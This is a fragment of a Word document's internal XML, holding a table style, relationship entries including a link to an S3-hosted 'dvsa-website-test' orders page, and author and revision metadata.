  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007A6D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84B6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dvsa-website-test-546079881937-us-east-1.s3-website.us-east-1.amazonaws.com/orders" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="URL:_____________"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54</TotalTime>
  <Pages>11</Pages>
  <Words>1482</Words>
  <Characters>8451</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REDHA ABDULAZIZ ALTURAIK</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>REDHA ABDULAZIZ ALTURAIK</cp:lastModifiedBy>
  <cp:revision>73</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T14:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-15T12:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>